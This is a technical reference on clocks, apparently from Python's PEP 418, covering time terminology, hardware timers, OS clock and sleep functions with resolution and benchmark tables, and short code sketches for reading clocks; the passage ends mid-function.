An instrument for measuring time. Different clocks have different +characteristics; for example, a clock with nanosecond +<precision> may start to <drift> after a few minutes, while a less +precise clock remains accurate for days. This PEP is primarily +concerned with clocks which use a unit of seconds.
+
Counter:
+
A clock which increments each time a certain event occurs. A +counter is strictly monotonic, but not a monotonic clock. It can +be used to generate a unique (and ordered) timestamp, but these +timestamps cannot be mapped to <civil time>; tick creation may well +be bursty, with several advances in the same millisecond followed +by several days without any advance.
+
CPU Time:
+
A measure of how much CPU effort has been spent on a certain task. +CPU seconds are often normalized (so that a variable number can +occur in the same actual second). CPU seconds can be important +when profiling, but they do not map directly to user response time, +nor are they directly comparable to (real time) seconds.
+
Drift:
+
The accumulated error against “true” time, as defined externally to +the system. Drift may be due to imprecision, or to a difference +between the average rate at which clock time advances and that of +real time.
+
Epoch:
+
The reference point of a clock. For clocks providing <civil time>, +this is often midnight as the day (and year) rolled over to January +1, 1970. For a <clock_monotonic> clock, the epoch may be undefined +(represented as None).
+
Latency:
+
Delay. By the time a clock call returns, the <real time> has +advanced, possibly by more than the precision of the clock.
+
Monotonic:
+
The characteristics expected of a monotonic clock in practice. +Moving in at most one direction; for clocks, that direction is +forward. The <clock> should also be <steady>, and should be +convertible to a unit of seconds. The tradeoffs often include lack +of a defined <epoch> or mapping to <Civil Time>.
+
Precision:
+
The amount of deviation among measurements of the same physical +value by a single instrument. Imprecision in clocks may be caused by +a fluctuation of the rate at which clock time advances relative to +real time, including clock adjustment by slewing.
+
Process Time:
+
Time elapsed since the process began. It is typically measured in +<CPU time> rather than <real time>, and typically does not advance +while the process is suspended.
+
Real Time:
+
Time in the real world. This differs from <Civil time> in that it +is not <adjusted>, but they should otherwise advance in lockstep. +It is not related to the “real time” of “Real Time [Operating] +Systems”. It is sometimes called “wall clock time” to avoid that +ambiguity; unfortunately, that introduces different ambiguities.
+
Resolution:
+
The smallest difference between two physical values that results +in a different measurement by a given instrument.
+
Slew:
+
A slight change to a clock’s speed, usually intended to correct +<drift> with respect to an external authority.
+
Stability:
+
Persistence of accuracy. A measure of expected <drift>.
+
Steady:
+
A clock with high <stability> and relatively high <accuracy> and +<precision>. In practice, it is often used to indicate a +<clock_monotonic> clock, but places greater emphasis on the +consistency of the duration between subsequent ticks.
+
Step:
+
An instantaneous change in the represented time. Instead of +speeding or slowing the clock (<slew>), a single offset is +permanently added.
+
System Time:
+
Time as represented by the Operating System.
+
Thread Time:
+
Time elapsed since the thread began. It is typically measured in +<CPU time> rather than <real time>, and typically does not advance +while the thread is idle.
+
Wallclock:
+
What the clock on the wall says. This is typically used as a +synonym for <real time>; unfortunately, wall time is itself +ambiguous.
+
+
+
+

Hardware clocks

+
+

List of hardware clocks

+
    +
  • HPET: A High Precision Event Timer (HPET) chip consists of a 64-bit +up-counter (main counter) counting at least at 10 MHz and a set of +up to 256 comparators (at least 3). Each HPET can have up to 32 +timers. HPET can cause around 3 seconds of drift per day.
  • +
  • TSC (Time Stamp Counter): Historically, the TSC increased with every +internal processor clock cycle, but now the rate is usually constant +(even if the processor changes frequency) and usually equals the +maximum processor frequency. Multiple cores have different TSC +values. Hibernating the system resets the TSC value. The RDTSC +instruction can be used to read this counter. On older processors, +CPU frequency scaling for power saving also changed the TSC rate.
  • +
  • ACPI Power Management Timer: ACPI 24-bit timer with a frequency of +3.5 MHz (3,579,545 Hz).
  • +
  • Cyclone: The Cyclone timer uses a 32-bit counter on IBM Extended +X-Architecture (EXA) chipsets which include computers that use the +IBM “Summit” series chipsets (ex: x440). This is available in IA32 +and IA64 architectures.
  • +
  • PIT (programmable interrupt timer): Intel 8253/8254 chipsets with a +configurable frequency in range 18.2 Hz - 1.2 MHz. It uses a 16-bit +counter.
  • +
  • RTC (Real-time clock). Most RTCs use a crystal oscillator with a +frequency of 32,768 Hz.
  • +
+
+
+

Linux clocksource

+

There were 4 implementations of the time in the Linux kernel: UTIME +(1996), timer wheel (1997), HRT (2001) and hrtimers (2007). The +latter is the result of the “high-res-timers” project started by +George Anzinger in 2001, with contributions by Thomas Gleixner and +Douglas Niehaus. The hrtimers implementation was merged into Linux +2.6.21, released in 2007.

+

hrtimers supports various clock sources. It sets a priority to each +source to decide which one will be used. Linux supports the following +clock sources:

+
    +
  • tsc
  • +
  • hpet
  • +
  • pit
  • +
  • pmtmr: ACPI Power Management Timer
  • +
  • cyclone
  • +
+

High-resolution timers are not supported on all hardware +architectures. They are at least provided on x86/x86_64, ARM and +PowerPC.

+

clock_getres() returns 1 nanosecond for CLOCK_REALTIME and +CLOCK_MONOTONIC regardless of underlying clock source. Read Re: +clock_getres() and real resolution from Thomas Gleixner (9 Feb +2012) for an explanation.

+

The /sys/devices/system/clocksource/clocksource0 directory +contains two useful files:

+
    +
  • available_clocksource: list of available clock sources
  • +
  • current_clocksource: clock source currently used. It is +possible to change the current clocksource by writing the name of a +clocksource into this file.
  • +
+

/proc/timer_list contains the list of all hardware timers.

+

Read also the time(7) manual page: +“overview of time and timers”.

+
+
+

FreeBSD timecounter

+

kern.timecounter.choice lists available hardware clocks with their +priority. The sysctl program can be used to change the timecounter. +Example:

+
# dmesg | grep Timecounter
+Timecounter "i8254" frequency 1193182 Hz quality 0
+Timecounter "ACPI-safe" frequency 3579545 Hz quality 850
+Timecounter "HPET" frequency 100000000 Hz quality 900
+Timecounter "TSC" frequency 3411154800 Hz quality 800
+Timecounters tick every 10.000 msec
+# sysctl kern.timecounter.choice
+kern.timecounter.choice: TSC(800) HPET(900) ACPI-safe(850) i8254(0) dummy(-1000000)
+# sysctl kern.timecounter.hardware="ACPI-fast"
+kern.timecounter.hardware: HPET -> ACPI-fast
+
+
+

Available clocks:

+
    +
  • “TSC”: Time Stamp Counter of the processor
  • +
  • “HPET”: High Precision Event Timer
  • +
  • “ACPI-fast”: ACPI Power Management timer (fast mode)
  • +
  • “ACPI-safe”: ACPI Power Management timer (safe mode)
  • +
  • “i8254”: PIT with Intel 8254 chipset
  • +
+

The commit 222222 (May +2011) decreased ACPI-fast timecounter quality to 900 and increased +HPET timecounter quality to 950: “HPET on modern platforms usually +have better resolution and lower latency than ACPI timer”.

+

Read Timecounters: Efficient and precise timekeeping in SMP kernels by Poul-Henning Kamp +(2002) for the FreeBSD Project.

+
+
+

Performance

+

Reading a hardware clock has a cost. The following table compares +the performance of different hardware clocks on Linux 3.3 with Intel +Core i7-2600 at 3.40GHz (8 cores). The bench_time.c program +was used to fill these tables.

========================  ======  =======  ======
Function                  TSC     ACPI PM  HPET
========================  ======  =======  ======
time()                    2 ns    2 ns     2 ns
CLOCK_REALTIME_COARSE     10 ns   10 ns    10 ns
CLOCK_MONOTONIC_COARSE    12 ns   13 ns    12 ns
CLOCK_THREAD_CPUTIME_ID   134 ns  135 ns   135 ns
CLOCK_PROCESS_CPUTIME_ID  127 ns  129 ns   129 ns
clock()                   146 ns  146 ns   143 ns
gettimeofday()            23 ns   726 ns   637 ns
CLOCK_MONOTONIC_RAW       31 ns   716 ns   607 ns
CLOCK_REALTIME            27 ns   707 ns   629 ns
CLOCK_MONOTONIC           27 ns   723 ns   635 ns
========================  ======  =======  ======

FreeBSD 8.0 in kvm with hardware virtualization:

=======================  ======  =========  =======  =======
Function                 TSC     ACPI-Safe  HPET     i8254
=======================  ======  =========  =======  =======
time()                   191 ns  188 ns     189 ns   188 ns
CLOCK_SECOND             187 ns  184 ns     187 ns   183 ns
CLOCK_REALTIME_FAST      189 ns  180 ns     187 ns   190 ns
CLOCK_UPTIME_FAST        191 ns  185 ns     186 ns   196 ns
CLOCK_MONOTONIC_FAST     188 ns  187 ns     188 ns   189 ns
CLOCK_THREAD_CPUTIME_ID  208 ns  206 ns     207 ns   220 ns
CLOCK_VIRTUAL            280 ns  279 ns     283 ns   296 ns
CLOCK_PROF               289 ns  280 ns     282 ns   286 ns
clock()                  342 ns  340 ns     337 ns   344 ns
CLOCK_UPTIME_PRECISE     197 ns  10380 ns   4402 ns  4097 ns
CLOCK_REALTIME           196 ns  10376 ns   4337 ns  4054 ns
CLOCK_MONOTONIC_PRECISE  198 ns  10493 ns   4413 ns  3958 ns
CLOCK_UPTIME             197 ns  10523 ns   4458 ns  4058 ns
gettimeofday()           202 ns  10524 ns   4186 ns  3962 ns
CLOCK_REALTIME_PRECISE   197 ns  10599 ns   4394 ns  4060 ns
CLOCK_MONOTONIC          201 ns  10766 ns   4498 ns  3943 ns
=======================  ======  =========  =======  =======

Each function was called 100,000 times and CLOCK_MONOTONIC was used to +get the time before and after. The benchmark was run 5 times, keeping +the minimum time.

+
+
+
+

NTP adjustment

+

NTP has different methods to adjust a clock:

+
    +
  • “slewing”: change the clock frequency to be slightly faster or +slower (which is done with adjtime()). Since the slew rate is +limited to 0.5 millisecond per second, each second of adjustment requires an +amortization interval of 2000 seconds. Thus, an adjustment of many +seconds can take hours or days to amortize.
  • +
  • “stepping”: jump by a large amount in a single discrete step (which +is done with settimeofday())
  • +
+

By default, the time is slewed if the offset is less than 128 ms, but +stepped otherwise.

+

Slewing is generally desirable (i.e. we should use CLOCK_MONOTONIC, +not CLOCK_MONOTONIC_RAW) if one wishes to measure “real” time (and not +a time-like object like CPU cycles). This is because the clock on the +other end of the NTP connection from you is probably better at keeping +time: hopefully that thirty-five thousand dollars of Cesium +timekeeping goodness is doing something better than your PC’s $3 +quartz crystal, after all.

+

Get more detail in the documentation of the NTP daemon.

+
+
+

Operating system time functions

+
+

Monotonic Clocks

=========================  ============  ===============  =============  ===============
Name                       C Resolution  Adjusted         Include Sleep  Include Suspend
=========================  ============  ===============  =============  ===============
gethrtime()                1 ns          No               Yes            Yes
CLOCK_HIGHRES              1 ns          No               Yes            Yes
CLOCK_MONOTONIC            1 ns          Slewed on Linux  Yes            No
CLOCK_MONOTONIC_COARSE     1 ns          Slewed on Linux  Yes            No
CLOCK_MONOTONIC_RAW        1 ns          No               Yes            No
CLOCK_BOOTTIME             1 ns          ?                Yes            Yes
CLOCK_UPTIME               1 ns          No               Yes            ?
mach_absolute_time()       1 ns          No               Yes            No
QueryPerformanceCounter()  -             No               Yes            ?
GetTickCount[64]()         1 ms          No               Yes            Yes
timeGetTime()              1 ms          No               Yes            ?
=========================  ============  ===============  =============  ===============

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

=======================  ================  =============  =================
Name                     Operating system  OS Resolution  Python Resolution
=======================  ================  =============  =================
QueryPerformanceCounter  Windows Seven     10 ns          10 ns
CLOCK_HIGHRES            SunOS 5.11        2 ns           265 ns
CLOCK_MONOTONIC          Linux 3.0         1 ns           322 ns
CLOCK_MONOTONIC_RAW      Linux 3.3         1 ns           628 ns
CLOCK_BOOTTIME           Linux 3.3         1 ns           628 ns
mach_absolute_time()     Mac OS 10.6       1 ns           3 µs
CLOCK_MONOTONIC          FreeBSD 8.2       11 ns          5 µs
CLOCK_MONOTONIC          OpenBSD 5.0       10 ms          5 µs
CLOCK_UPTIME             FreeBSD 8.2       11 ns          6 µs
CLOCK_MONOTONIC_COARSE   Linux 3.3         1 ms           1 ms
CLOCK_MONOTONIC_COARSE   Linux 3.0         4 ms           4 ms
GetTickCount64()         Windows Seven     16 ms          15 ms
=======================  ================  =============  =================

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.
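One way to measure such a “Python resolution” (a simplified sketch of the +approach; the actual clock_resolution.py script may differ):

import time
+
+def measured_resolution(clock=time.monotonic, samples=100000):
+    # smallest non-zero difference observed between two readings
+    best = float("inf")
+    previous = clock()
+    for _ in range(samples):
+        current = clock()
+        if current != previous:
+            best = min(best, current - previous)
+            previous = current
+    return best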

+
+

mach_absolute_time

+

Mac OS X provides a monotonic clock: mach_absolute_time(). It is +based on absolute elapsed time since system boot. It is not +adjusted and cannot be set.

+

mach_timebase_info() gives a fraction to convert the clock value to a number of +nanoseconds. See also the Technical Q&A QA1398.

+

mach_absolute_time() stops during a sleep on a PowerPC CPU, but not on +an Intel CPU: Different behaviour of mach_absolute_time() on i386/ppc.

+
+
+

CLOCK_MONOTONIC, CLOCK_MONOTONIC_RAW, CLOCK_BOOTTIME

+

CLOCK_MONOTONIC and CLOCK_MONOTONIC_RAW represent monotonic time since +some unspecified starting point. They cannot be set. The resolution +can be read using clock_getres().

+

Documentation: refer to the manual page of your operating system. +Examples:

+ +

CLOCK_MONOTONIC is available at least on the following operating +systems:

+
    +
  • DragonFly BSD, FreeBSD >= 5.0, OpenBSD, NetBSD
  • +
  • Linux
  • +
  • Solaris
  • +
+

The following operating systems don’t support CLOCK_MONOTONIC:

  • GNU/Hurd
  • Mac OS X (which provides mach_absolute_time() instead)
  • Windows (which provides GetTickCount[64]() and QueryPerformanceCounter() instead)

On Linux, NTP may adjust the CLOCK_MONOTONIC rate (slewed), but it cannot +jump backward.

+

CLOCK_MONOTONIC_RAW is specific to Linux. It is similar to +CLOCK_MONOTONIC, but provides access to a raw hardware-based time that +is not subject to NTP adjustments. CLOCK_MONOTONIC_RAW requires Linux +2.6.28 or later.

+

Linux 2.6.39 and glibc 2.14 introduced a new clock: CLOCK_BOOTTIME. +CLOCK_BOOTTIME is identical to CLOCK_MONOTONIC, except that it also +includes any time spent in suspend. Read also Waking systems from +suspend (March, 2011).

+

CLOCK_MONOTONIC stops while the machine is suspended.

+

Linux also provides CLOCK_MONOTONIC_COARSE since Linux 2.6.32. It is similar to CLOCK_MONOTONIC but less precise and faster.

+

clock_gettime() fails if the system does not support the specified clock, even if the standard C library supports it. For example, CLOCK_MONOTONIC_RAW requires kernel version 2.6.28 or later.
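This failure mode can be probed from Python. A minimal sketch, assuming Python 3.3 or later (where time.clock_gettime() and the CLOCK_* constants are exposed) on a POSIX system:

import time

def best_monotonic():
    # Try the raw hardware clock first (needs Linux >= 2.6.28),
    # then fall back to the NTP-slewed CLOCK_MONOTONIC.
    for name in ("CLOCK_MONOTONIC_RAW", "CLOCK_MONOTONIC"):
        clock_id = getattr(time, name, None)
        if clock_id is None:
            continue  # constant not defined by the C library
        try:
            return name, time.clock_gettime(clock_id)
        except OSError:
            continue  # defined by libc, but rejected by the kernel
    raise RuntimeError("no monotonic clock available")

print(best_monotonic())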

+
+
+

Windows: QueryPerformanceCounter

+

High-resolution performance counter. It is monotonic. +The frequency of the counter can be read using QueryPerformanceFrequency(). +The resolution is 1 / QueryPerformanceFrequency().

+

It has a much higher resolution, but lower long-term precision, than the GetTickCount() and timeGetTime() clocks: for example, it drifts relative to those low-precision clocks.

+

Documentation:

+ +

Hardware clocks used by QueryPerformanceCounter:

+
    +
  • Windows XP: RDTSC instruction of Intel processors, the clock +frequency is the frequency of the processor (between 200 MHz and 3 +GHz, usually greater than 1 GHz nowadays).
  • +
  • Windows 2000: ACPI power management timer, frequency = 3,549,545 Hz. +It can be forced through the “/usepmtimer” flag in boot.ini.
  • +
+

QueryPerformanceFrequency() should only be called once: the frequency +will not change while the system is running. It fails if the +installed hardware does not support a high-resolution performance +counter.

+

QueryPerformanceCounter() cannot be adjusted: +SetSystemTimeAdjustment() +only adjusts the system time.
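For illustration, the counter can be read from Python with ctypes. A minimal sketch, Windows-only:

import ctypes

kernel32 = ctypes.windll.kernel32  # Windows only

def perf_counter_seconds():
    # The counter's resolution is 1 / QueryPerformanceFrequency();
    # QueryPerformanceFrequency() returns 0 if the hardware has no
    # high-resolution performance counter.
    count = ctypes.c_int64()
    freq = ctypes.c_int64()
    if not kernel32.QueryPerformanceFrequency(ctypes.byref(freq)):
        raise OSError("no high-resolution performance counter")
    kernel32.QueryPerformanceCounter(ctypes.byref(count))
    return count.value / freq.value  # seconds since an arbitrary start

print(perf_counter_seconds())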

+

Bugs:

+
    +
  • The performance counter value may unexpectedly leap forward because +of a hardware bug, see KB274323.
  • +
  • On VirtualBox, QueryPerformanceCounter() does not increment the high +part every time the low part overflows, see Monotonic timers +(2009).
  • +
  • VirtualBox had a bug in its HPET virtualized device: QueryPerformanceCounter() jumped forward by approximately 42 seconds (issue #8707).
  • +
  • Windows XP had a bug (see KB896256): on a multiprocessor +computer, QueryPerformanceCounter() returned a different value for +each processor. The bug was fixed in Windows XP SP2.
  • +
  • Issues with processors with variable frequency: the frequency changes depending on the workload to reduce power consumption.
  • +
  • Chromium doesn’t use QueryPerformanceCounter() on Athlon X2 CPUs (model 15) because “QueryPerformanceCounter is unreliable” (see base/time_win.cc in the Chromium source code).
  • +
+
+
+

Windows: GetTickCount(), GetTickCount64()

+

GetTickCount() and GetTickCount64() are monotonic, cannot fail and are +not adjusted by SetSystemTimeAdjustment(). MSDN documentation: +GetTickCount(), +GetTickCount64(). +The resolution can be read using GetSystemTimeAdjustment().

+

The elapsed time retrieved by GetTickCount() or GetTickCount64() +includes time the system spends in sleep or hibernation.

+

GetTickCount64() was added in Windows Vista and Windows Server 2008.
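A minimal ctypes sketch, assuming Windows Vista or later since it calls the 64-bit variant:

import ctypes

kernel32 = ctypes.windll.kernel32  # Windows only
kernel32.GetTickCount64.restype = ctypes.c_uint64

def uptime_milliseconds():
    # Milliseconds since boot, including sleep and hibernation;
    # unlike GetTickCount(), it does not wrap after 49.7 days.
    return kernel32.GetTickCount64()

print(uptime_milliseconds())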

+

It is possible to improve the precision using the undocumented NtSetTimerResolution() function. Some applications use this undocumented function; one example is Timer Resolution.

+

WaitForSingleObject() uses the same timer as GetTickCount() with the +same precision.

+
+
+

Windows: timeGetTime

+

The timeGetTime function retrieves the system time, in milliseconds. +The system time is the time elapsed since Windows was started. Read +the timeGetTime() documentation.

+

The return type of timeGetTime() is a 32-bit unsigned integer. Like GetTickCount(), timeGetTime() rolls over after 2^32 milliseconds (about 49.7 days).

+

The elapsed time retrieved by timeGetTime() includes time the system +spends in sleep.

+

The default precision of the timeGetTime function can be five +milliseconds or more, depending on the machine.

+

timeBeginPeriod() can be used to increase the precision of +timeGetTime() up to 1 millisecond, but it negatively affects power +consumption. Calling timeBeginPeriod() also affects the granularity +of some other timing calls, such as CreateWaitableTimer(), +WaitForSingleObject() and Sleep().
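For illustration, a minimal ctypes sketch (Windows-only) that raises the timer precision around a single reading; winmm.dll is loaded dynamically, as the note below explains:

import ctypes

winmm = ctypes.windll.winmm  # loads winmm.dll dynamically

def read_timegettime(period_ms=1):
    # Temporarily raise the timer precision to ~1 ms, read the
    # 32-bit millisecond counter, then restore the default period.
    winmm.timeBeginPeriod(period_ms)
    try:
        return winmm.timeGetTime()
    finally:
        winmm.timeEndPeriod(period_ms)

print(read_timegettime())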

+
+

Note

+

timeGetTime() and timeBeginPeriod() are part of the Windows multimedia library, so using them requires linking the program against winmm or loading the library dynamically.

+
+
+
+

Solaris: CLOCK_HIGHRES

+

Solaris has a CLOCK_HIGHRES timer: a nonadjustable, high-resolution clock that may give close to nanosecond resolution. For timers created with a clockid_t value of CLOCK_HIGHRES, the system attempts to use an optimal hardware source.

+

The resolution of CLOCK_HIGHRES can be read using clock_getres().

+
+
+

Solaris: gethrtime

+

The gethrtime() function returns the current high-resolution real +time. Time is expressed as nanoseconds since some arbitrary time in +the past; it is not correlated in any way to the time of day, and thus +is not subject to resetting or drifting by way of adjtime() or +settimeofday(). The hires timer is ideally suited to performance +measurement tasks, where cheap, accurate interval timing is required.

+

The linearity of gethrtime() is not preserved across a suspend-resume +cycle (Bug 4272663).

+

Read the gethrtime() manual page of Solaris 11.

+

On Solaris, gethrtime() is the same as clock_gettime(CLOCK_MONOTONIC).

+
+
+
+

System Time

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC ResolutionInclude SleepInclude Suspend
CLOCK_REALTIME1 nsYesYes
CLOCK_REALTIME_COARSE1 nsYesYes
GetSystemTimeAsFileTime100 nsYesYes
gettimeofday()1 µsYesYes
ftime()1 msYesYes
time()1 secYesYes
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
CLOCK_REALTIMESunOS 5.1110 ms238 ns
CLOCK_REALTIMELinux 3.01 ns238 ns
gettimeofday()Mac OS 10.61 µs4 µs
CLOCK_REALTIMEFreeBSD 8.211 ns6 µs
CLOCK_REALTIMEOpenBSD 5.010 ms5 µs
CLOCK_REALTIME_COARSELinux 3.31 ms1 ms
CLOCK_REALTIME_COARSELinux 3.04 ms4 ms
GetSystemTimeAsFileTime()Windows Seven16 ms1 ms
ftime()Windows Seven-1 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

Windows: GetSystemTimeAsFileTime

+

The system time can be read using GetSystemTimeAsFileTime(), ftime() and +time(). The resolution of the system time can be read using +GetSystemTimeAdjustment().

+

Read the GetSystemTimeAsFileTime() documentation.

+

The system time can be set using SetSystemTime().
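A minimal ctypes sketch, Windows-only; the FILETIME layout comes from the Windows headers:

import ctypes

class FILETIME(ctypes.Structure):
    _fields_ = [("dwLowDateTime", ctypes.c_uint32),
                ("dwHighDateTime", ctypes.c_uint32)]

kernel32 = ctypes.windll.kernel32  # Windows only

def system_time_100ns():
    # 100-nanosecond intervals since January 1, 1601 (UTC).
    ft = FILETIME()
    kernel32.GetSystemTimeAsFileTime(ctypes.byref(ft))
    return (ft.dwHighDateTime << 32) | ft.dwLowDateTime

print(system_time_100ns())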

+
+
+

System time on UNIX

+

gettimeofday(), ftime(), time() and clock_gettime(CLOCK_REALTIME) return +the system time. The resolution of CLOCK_REALTIME can be read using +clock_getres().
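A minimal sketch of these interfaces from Python, assuming Python 3.3 or later on a POSIX system:

import time

# Two views of the same settable, non-monotonic system clock.
print(time.time())                              # float seconds
print(time.clock_gettime(time.CLOCK_REALTIME))  # same clock, POSIX API

# Announced resolution of CLOCK_REALTIME, in seconds.
print(time.clock_getres(time.CLOCK_REALTIME))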

+

The system time can be set using settimeofday() or +clock_settime(CLOCK_REALTIME).

+

Linux also provides CLOCK_REALTIME_COARSE since Linux 2.6.32. It is similar to CLOCK_REALTIME but less precise and faster.

+

Alexander Shishkin proposed an API for Linux to be notified when the system clock is changed: timerfd: add TFD_NOTIFY_CLOCK_SET to watch for clock changes (4th version of the API, March 2011). The API has not been accepted yet, but CLOCK_BOOTTIME provides a similar feature.

+
+
+
+

Process Time

+

The process time cannot be set. It is not monotonic: the clocks stop +while the process is idle.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC ResolutionInclude SleepInclude Suspend
GetProcessTimes()100 nsNoNo
CLOCK_PROCESS_CPUTIME_ID1 nsNoNo
getrusage(RUSAGE_SELF)1 µsNoNo
times()-NoNo
clock()-Yes on Windows, No otherwiseNo
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
CLOCK_PROCESS_CPUTIME_IDLinux 3.31 ns1 ns
CLOCK_PROFFreeBSD 8.210 ms1 µs
getrusage(RUSAGE_SELF)FreeBSD 8.2-1 µs
getrusage(RUSAGE_SELF)SunOS 5.11-1 µs
CLOCK_PROCESS_CPUTIME_IDLinux 3.01 ns1 µs
getrusage(RUSAGE_SELF)Mac OS 10.6-5 µs
clock()Mac OS 10.61 µs5 µs
CLOCK_PROFOpenBSD 5.0-5 µs
getrusage(RUSAGE_SELF)Linux 3.0-4 ms
getrusage(RUSAGE_SELF)OpenBSD 5.0-8 ms
clock()FreeBSD 8.28 ms8 ms
clock()Linux 3.01 µs10 ms
times()Linux 3.010 ms10 ms
clock()OpenBSD 5.010 ms10 ms
times()OpenBSD 5.010 ms10 ms
times()Mac OS 10.610 ms10 ms
clock()SunOS 5.111 µs10 ms
times()SunOS 5.111 µs10 ms
GetProcessTimes()Windows Seven16 ms16 ms
clock()Windows Seven1 ms1 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

Functions

+
    +
  • Windows: GetProcessTimes(). +The resolution can be read using GetSystemTimeAdjustment().
  • +
  • clock_gettime(CLOCK_PROCESS_CPUTIME_ID): High-resolution per-process +timer from the CPU. The resolution can be read using clock_getres().
  • +
  • clock(). The resolution is 1 / CLOCKS_PER_SEC.
      +
    • Windows: The elapsed wall-clock time since the start of the process (elapsed time in seconds times CLOCKS_PER_SEC). It includes time elapsed during sleep. It can fail.
    • +
    • UNIX: returns an approximation of processor time used by the +program.
    • +
    +
  • +
  • getrusage(RUSAGE_SELF) returns a structure of resource usage for the current process. ru_utime is the user CPU time and ru_stime is the system CPU time.
  • +
  • times(): structure of process times. The resolution is 1 / ticks_per_second, where ticks_per_second is sysconf(_SC_CLK_TCK) or the HZ constant (see the sketch after this list).
  • +
+
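A minimal sketch of the POSIX interfaces listed above, assuming Python 3.3 or later on Linux (CLOCK_PROCESS_CPUTIME_ID is not available everywhere):

import os
import resource
import time

usage = resource.getrusage(resource.RUSAGE_SELF)
print(usage.ru_utime + usage.ru_stime)   # user + system CPU, getrusage()

t = os.times()
print(t.user + t.system)                 # same information via times()

print(time.clock_gettime(time.CLOCK_PROCESS_CPUTIME_ID))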

Python source code includes a portable library to get the process time (CPU +time): Tools/pybench/systimes.py.

+

See also the QueryProcessCycleTime() function +(sum of the cycle time of all threads) and clock_getcpuclockid().

+
+
+
+

Thread Time

+

The thread time cannot be set. It is not monotonic: the clocks stop +while the thread is idle.

+ + + + + + + + + + + + + + + + + + + + +
NameC ResolutionInclude SleepInclude Suspend
CLOCK_THREAD_CPUTIME_ID1 nsYesEpoch changes
GetThreadTimes()100 nsNo?
+

The “C Resolution” column is the resolution of the underlying C +structure.

+

Examples of clock resolution on x86_64:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
NameOperating systemOS ResolutionPython Resolution
CLOCK_THREAD_CPUTIME_IDFreeBSD 8.21 µs1 µs
CLOCK_THREAD_CPUTIME_IDLinux 3.31 ns649 ns
GetThreadTimes()Windows Seven16 ms16 ms
+

The “OS Resolution” is the resolution announced by the operating +system. +The “Python Resolution” is the smallest difference between two calls +to the time function computed in Python using the clock_resolution.py +program.

+
+

Functions

+
    +
  • Windows: GetThreadTimes(). +The resolution can be read using GetSystemTimeAdjustment().
  • +
  • clock_gettime(CLOCK_THREAD_CPUTIME_ID): Thread-specific CPU-time clock. It uses a number of CPU cycles, not a number of seconds. The resolution can be read using clock_getres() (see the sketch after this list).
  • +
+
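A minimal sketch, assuming Python 3.3 or later on a system that defines CLOCK_THREAD_CPUTIME_ID (e.g. Linux):

import threading
import time

def report_thread_cpu():
    sum(i * i for i in range(10**6))  # burn some CPU in this thread
    print(time.clock_gettime(time.CLOCK_THREAD_CPUTIME_ID))

worker = threading.Thread(target=report_thread_cpu)
worker.start()
worker.join()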

See also the QueryThreadCycleTime() function +(cycle time for the specified thread) and pthread_getcpuclockid().

+
+
+
+

Windows: QueryUnbiasedInterruptTime

+

Gets the current unbiased interrupt time from the biased interrupt +time and the current sleep bias amount. This time is not affected by +power management sleep transitions.

+

The elapsed time retrieved by the QueryUnbiasedInterruptTime function +includes only time that the system spends in the working state. +QueryUnbiasedInterruptTime() is not monotonic.

+

QueryUnbiasedInterruptTime() was introduced in Windows 7.

+

See also the QueryIdleProcessorCycleTime() function (cycle time for the idle thread of each processor).

+
+
+

Sleep

+

Suspend execution of the process for the given number of seconds. Sleep is not affected by system time updates. Sleep is paused during system suspend. For example, if a process sleeps for 60 seconds and the system is suspended for 30 seconds in the middle of the sleep, the sleep duration is 90 seconds in real time.

+

Sleep can be interrupted by a signal: the function fails with EINTR.
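A common way to handle this is to recompute the remaining delay and retry. A minimal sketch, assuming Python 3.3 or later (Python 3.5 and later retry automatically, per PEP 475):

import time

def sleep_retry(seconds):
    deadline = time.monotonic() + seconds
    while True:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            return
        try:
            time.sleep(remaining)
        except InterruptedError:  # EINTR: a signal interrupted the sleep
            continue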

+ + + + + + + + + + + + + + + + + + + + + + + +
NameC Resolution
nanosleep()1 ns
clock_nanosleep()1 ns
usleep()1 µs
delay()1 µs
sleep()1 sec
+

Other functions:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameC Resolution
sigtimedwait()1 ns
pthread_cond_timedwait()1 ns
sem_timedwait()1 ns
select()1 µs
epoll()1 ms
poll()1 ms
WaitForSingleObject()1 ms
+

The “C Resolution” column is the resolution of the underlying C +structure.

+
+

Functions

+ +
+
+

clock_nanosleep

+

clock_nanosleep(clock_id, flags, request, remaining): see the Linux manpage of clock_nanosleep().

+

If flags is TIMER_ABSTIME, then request is interpreted as an absolute +time as measured by the clock, clock_id. If request is less than or +equal to the current value of the clock, then clock_nanosleep() +returns immediately without suspending the calling thread.

+

POSIX.1 specifies that changing the value of the CLOCK_REALTIME clock +via clock_settime(2) shall have no effect on a thread that is blocked +on a relative clock_nanosleep().
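clock_nanosleep() is not exposed by the Python standard library, but it can be reached with ctypes. A minimal sketch, assuming Linux with glibc (the CLOCK_MONOTONIC and TIMER_ABSTIME values are taken from Linux’s <time.h>):

import ctypes
import time

class timespec(ctypes.Structure):
    _fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]

librt = ctypes.CDLL("librt.so.1", use_errno=True)  # Linux/glibc only
CLOCK_MONOTONIC = 1   # <time.h>, Linux
TIMER_ABSTIME = 1     # <time.h>, Linux

def sleep_until(deadline):
    # Absolute sleep against CLOCK_MONOTONIC: restarting after a
    # signal cannot stretch the total delay.
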